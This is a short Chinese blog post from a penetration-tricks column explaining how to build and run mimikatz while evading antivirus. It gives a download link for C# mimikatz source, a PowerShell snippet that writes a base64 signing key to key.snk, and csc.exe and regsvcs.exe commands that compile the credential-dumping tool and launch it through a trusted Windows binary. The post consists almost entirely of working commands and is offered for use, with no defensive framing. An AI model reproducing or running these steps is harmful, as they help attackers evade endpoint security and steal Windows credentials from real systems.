美文网首页渗透技巧
用.net2.0免杀mimikatz

用.net2.0免杀mimikatz

作者: 身自在 | 来源:发表于2018-11-19 21:13 被阅读7次

    https://raw.githubusercontent.com/ssssanr/Mimikatz-Csharp/master/katz.cs
    首先下载katz.cs并将其放置对应系统版本的Framework目录中
    32:C:\Windows\Microsoft.NET\Framework\v2.0.50727
    64:C:\Windows\Microsoft.NET\Framework64\v2.0.50727

    然后powershell执行命令生成key.snk

    $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
    $Content = [System.Convert]::FromBase64String($key)
    Set-Content key.snk -Value $Content -Encoding Byte
    

    最后生成mimikatz,运行即可:
    32位:

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
    

    64位:

    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe katz.exe
    

    免杀

    相关文章

      网友评论

        本文标题:用.net2.0免杀mimikatz

        本文链接:https://www.haomeiwen.com/subject/lqxzfqtx.html